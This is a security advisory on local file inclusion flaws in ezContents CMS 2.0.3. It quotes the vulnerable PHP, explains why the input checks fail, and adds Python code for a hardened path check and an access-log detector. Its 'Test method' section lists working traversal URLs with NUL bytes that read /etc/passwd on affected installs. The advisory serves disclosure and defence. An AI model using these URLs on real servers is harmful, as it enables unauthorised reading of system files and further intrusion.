ezContents CMS Multiple Local File Inclusion Vulnerabilities

Published: 2008-08-25
Updated: 2008-08-26

Affected systems:
VisualShapers ezContents 2.0.3
Description:
BUGTRAQ ID: 30821

ezContents is an open-source content management system.

Several ezContents scripts do not properly validate their input parameters. A remote attacker can include arbitrary local resources and thereby execute arbitrary code.

1. Local file inclusion in /module.php

Vulnerable code at lines 32-42 and 141-145
--------------------------
#################################################

$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");

// Accept "ezSID" and "link" from either GET or POST
if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"];
if ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) $HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];

// Single left-to-right pass: a "....//" sequence collapses to "../" rather than being removed
$HTTP_GET_VARS["link"] = str_replace('../', '', $HTTP_GET_VARS["link"]);

...

// isExternalLink() only rejects URL schemes; a relative path passes straight into include()
if (isExternalLink ($HTTP_GET_VARS["link"])) {
        ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';
} else {
        include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);
}

#################################################

The isExternalLink() function in /include/functions.php is used to check for remote inclusion attempts.

Lines 768-779
-------------------
#################################################

function isExternalLink ($linkref)
{
        if ( (substr($linkref,0,5) == 'http:')   || (substr($linkref,0,6) == 'https:')  ||
             (substr($linkref,0,5) == 'file:')   || (substr($linkref,0,4) == 'ftp:')    ||
             (substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) == 'mailto:') ||
             (substr($linkref,0,5) == 'news:')   || (substr($linkref,0,7) == 'telnet:') ||
             (substr($linkref,0,5) == 'wais:') ) {
                 return True;
        } else {
                 return False;
        }
} // isExternalLink

#################################################

2. Local file inclusion in /modules/diary/showdiary.php, /modules/diary/showeventlist.php, /modules/gallery/showgallery.php and /modules/reviews/showreviews.php

A successful attack requires register_globals to be enabled.

showdiary.php, lines 32-45
--------------------------------
#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
         require_once('./modules/moduleSec.php');
} else {
        require_once('../moduleSec.php');
}

$GLOBALS["ModuleName"] = 'diary';

// No exit after Header(): the include_once() calls below still run
if (!isset($GLOBALS["gsLanguage"])) {
        Header("Location: ".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"]."/showdiary.php");
}
// language_home and gsLanguage are globals; with register_globals on, both can come from the request
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################

The /modules/moduleSec.php script is used to check inclusion attempts.

#################################################

function moduleExternalLink ($linkref)
{
        if ($linkref != '') {
                if ( (substr($linkref,0,5) == 'http:')   || (substr($linkref,0,6) == 'https:')  ||
                     (substr($linkref,0,5) == 'file:')   || (substr($linkref,0,4) == 'ftp:')    ||
                     (substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) == 'mailto:') ||
                     (substr($linkref,0,5) == 'news:')   || (substr($linkref,0,7) == 'telnet:') ||
                     (substr($linkref,0,5) == 'wais:') ) {
                         return True;
                } else {
                        return False;
                }
        } else {
                return False;
        }
} // moduleExternalLink


// Only checks that rootdp is set, not where it came from
if (!(isset($GLOBALS["rootdp"]))) {
         ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';  DIE;
}
// Only rejects URL schemes; a client-supplied relative path passes
if ( (moduleExternalLink($GLOBALS["rootdp"])) ||
     (moduleExternalLink($GLOBALS["modfiledir"])) ||
     (moduleExternalLink($GLOBALS["modules_home"])) ||
     (moduleExternalLink($GLOBALS["admin_home"])) ||
     (moduleExternalLink($GLOBALS["language_home"])) ) {
         ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';  DIE;
}

#################################################
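The two checks above share one weakness: isExternalLink() and moduleExternalLink() reject only URL schemes, so a relative path is never flagged, and module.php's single-pass str_replace() turns "....//" into "../" instead of removing it. The following Python block is an added example, not ezContents code and not part of the advisory: it mirrors those two checks to show their behaviour, then gives a confining replacement that canonicalises the joined path, rejects NUL bytes and anything outside the web root or outside the module directory, and allow-lists gsLanguage by shape. The root path /srv/ezcontents, the allowed directory "modules/", and the locale-code pattern are assumptions for illustration, not values from ezContents.

```python
import posixpath
import re

# Added example (not ezContents code). Names and paths below are
# illustrative assumptions.

# Mirror of isExternalLink() (functions.php, lines 768-779) and
# moduleExternalLink() (moduleSec.php): only URL schemes are rejected,
# so a relative path such as ../../etc/passwd is never flagged.
EXTERNAL_PREFIXES = ("http:", "https:", "file:", "ftp:", "gopher:",
                     "mailto:", "news:", "telnet:", "wais:")


def is_external_link(linkref):
    return linkref != "" and linkref.startswith(EXTERNAL_PREFIXES)


def ezcontents_strip(link):
    """Mirror of module.php's str_replace('../', '', $link).

    PHP's str_replace and Python's str.replace both make one
    left-to-right pass, so '....//' is reduced to '../', not removed.
    """
    return link.replace("../", "")


# Hardened replacement (assumed design): canonicalise the joined path and
# refuse anything that leaves the web root, leaves the allowed module
# directory, or is not a .php file. rootdp must be absolute. On a live
# system also pass the result through os.path.realpath() so a symlink
# cannot point outside the root.
def confined_include_path(rootdp, link, allowed_dirs=("modules/",)):
    if not posixpath.isabs(rootdp):
        raise ValueError("rootdp must be an absolute path")
    if "\0" in link:  # a NUL truncates the path in PHP < 5.3.4 include()
        return None
    root = posixpath.normpath(rootdp)
    candidate = posixpath.normpath(posixpath.join(root, link))
    if posixpath.commonpath([root, candidate]) != root:
        return None  # escaped the web root
    rel = posixpath.relpath(candidate, root)
    if not any(rel.startswith(d) for d in allowed_dirs):
        return None  # inside the root but outside the module tree
    if not rel.endswith(".php"):
        return None
    return candidate


# gsLanguage names a directory under language_home. Rather than stripping
# characters, accept only names shaped like a locale code (assumed pattern;
# on a real install, compare against the directories that actually exist).
LANGUAGE_RE = re.compile(r"^[A-Za-z]{2,3}(?:_[A-Za-z]{2,4})?$")


def confined_language(gs_language):
    return gs_language if LANGUAGE_RE.fullmatch(gs_language) else None


if __name__ == "__main__":
    payload = "....//....//....//etc/passwd"
    print("scheme check flags it:", is_external_link(payload))
    print("after single-pass strip:", ezcontents_strip(payload))
    print("confined:", confined_include_path("/srv/ezcontents", payload))
    print("confined:", confined_include_path("/srv/ezcontents",
                                             "modules/news/inlinenews.php"))
```

Note that confined_include_path() works on the joined path, not on the raw parameter, so "modules/../include/config.php" is rejected even though it starts with the allowed prefix.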

3. Local file inclusion in /modules/diary/showdiarydetail.php, /modules/gallery/showgallerydetails.php, /modules/reviews/showreviewsdetails.php and /modules/news/shownewsdetails.php

A successful attack requires register_globals to be enabled.

showdiarydetail.php, lines 32-46
--------------------------------------
#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
         require_once('./modules/moduleSec.php');
} else {
        require_once('../moduleSec.php');
}

$GLOBALS["ModuleName"] = 'diary';

include_once ($GLOBALS["admin_home"]."compile.php");

include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################

4. Local file inclusion in /modules/diary/submit_diary.php, /modules/gallery/submit_gallery.php, /modules/guestbook/submit_guestbook.php, /modules/reviews/submit_reviews.php and /modules/news/submit_news.php

A successful attack requires register_globals to be enabled.

submit_diary.php, lines 32-51
-----------------------------------
#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
         require_once('./modules/moduleSec.php');
} else {
        require_once('../moduleSec.php');
}

// Localisation variables (used for default values)
// Change these to suit your site preferences
//
$expiryperiod = 'm';                    // Time period to calculate the banner expiry date (based on today's date)
$expirynumber = 1;


$GLOBALS["ModuleName"] = 'diary';

include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################

5. Local file inclusion in /modules/news/archivednews_summary.php and /modules/news/news_summary.php

A successful attack requires register_globals to be enabled.

news_summary.php, lines 32-41
-----------------------------------
#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
         require_once('./modules/moduleSec.php');
} else {
        require_once('../moduleSec.php');
}

include_once ($GLOBALS["admin_home"]."compile.php");

#################################################

6. Local file inclusion in /modules/diary/inlineeventlist.php and /modules/news/inlinenews.php

A successful attack requires register_globals to be enabled.

inlinenews.php, lines 32-52
---------------------------------
#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
         (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
         require_once('./modules/moduleSec.php');
} else {
        require_once('../moduleSec.php');
}

global $EZ_SESSION_VARS;

$GLOBALS["ModuleName"] = 'news';

$linkref = $nLink;
$chainlink = explode('/',$linkref);
$modfilename = array_pop($chainlink);
$GLOBALS["modfiledir"] = implode('/',$chainlink);
include($GLOBALS["modfiledir"]."/moduleref.php");

include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################

<*Source: Digital Security Research Group
  
  Links: http://marc.info/?l=bugtraq&m=121968090815635&w=2
         http://secunia.com/advisories/31606/
*>

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided for security research and educational purposes only. Use at your own risk!

http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
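
Seen from the defender's side, requests of the shape listed above leave a recognisable trace in the web server's access log. The following Python script is an added example, not part of the advisory and not ezContents code: it parses constructed Apache combined-format log lines, URL-decodes the query string, and flags requests to the scripts named in this advisory in which a configuration global (rootdp, modules_home, admin_home, language_home, modfiledir) is supplied by the client at all, or a path-bearing parameter (link, nLink, gsLanguage) carries a traversal sequence, a NUL byte, or a "....//" sequence that would survive module.php's single-pass stripping. The log lines, client addresses and paths are constructed; the line regex assumes Apache's combined format and needs adjusting for other formats.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format). Addresses
# are documentation ranges; the request paths follow the advisory's PoCs.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Aug/2008:10:01:12 +0000] "GET /ez/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../etc/passwd%00/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Aug/2008:10:01:20 +0000] "GET /ez/module.php?link=....//....//....//etc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Aug/2008:10:01:31 +0000] "GET /ez/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../etc/passwd%00 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Aug/2008:10:02:00 +0000] "GET /ez/module.php?link=modules/news/inlinenews.php HTTP/1.1" 200 8211 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Aug/2008:10:02:05 +0000] "GET /ez/modules/diary/showdiary.php?gsLanguage=en HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Scripts named in this advisory
EZ_SCRIPTS = {
    "module.php", "showdiary.php", "showeventlist.php", "showgallery.php",
    "showreviews.php", "showdiarydetail.php", "showgallerydetails.php",
    "showreviewsdetails.php", "shownewsdetails.php", "submit_diary.php",
    "submit_gallery.php", "submit_guestbook.php", "submit_reviews.php",
    "submit_news.php", "archivednews_summary.php", "news_summary.php",
    "inlineeventlist.php", "inlinenews.php",
}
# Globals the scripts expect from config.php. With register_globals on, a
# query parameter of the same name overrides them, so their mere presence
# in a request is a signal.
CONFIG_GLOBALS = {"rootdp", "modules_home", "admin_home", "language_home",
                  "modfiledir"}
# Parameters that legitimately reach the scripts but end up in include()
PATH_PARAMS = {"link", "nLink", "gsLanguage"}


def suspicious_path_value(value):
    """Reasons a decoded parameter value looks like an inclusion attempt."""
    reasons = []
    if "\0" in value:
        reasons.append("null byte")
    if re.search(r"\.\.[\\/]", value):
        reasons.append("directory traversal")
    # module.php strips '../' in one pass; if '../' is still present after
    # that pass, the request was built to survive the filter.
    if "../" in value.replace("../", ""):
        reasons.append("survives single-pass '../' stripping")
    return reasons


def analyze_request(target):
    """Return a list of reasons (empty when the request looks benign)."""
    parts = urlsplit(target)
    if posixpath.basename(parts.path) not in EZ_SCRIPTS:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for name, values in params.items():
        if name in CONFIG_GLOBALS:
            reasons.append(f"{name}: configuration global supplied by client")
        if name in CONFIG_GLOBALS or name in PATH_PARAMS:
            for v in values:
                reasons.extend(f"{name}: {r}" for r in suspicious_path_value(v))
    return reasons


def scan_log(text):
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m.group("target"))
        if reasons:
            hits.append({"line": lineno, "ip": m.group("ip"),
                         "path": urlsplit(m.group("target")).path,
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} {hit['ip']} {hit['path']}")
        for reason in hit["reasons"]:
            print("   ", reason)
```

Only GET requests are visible in the access log; module.php also accepts "link" via POST, so for full coverage the same checks belong in a request-level filter (mod_security or an application-level hook) that sees the request body.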

Recommendation:
Vendor patch:

VisualShapers
-------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version:

http://www.visualshapers.com/

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.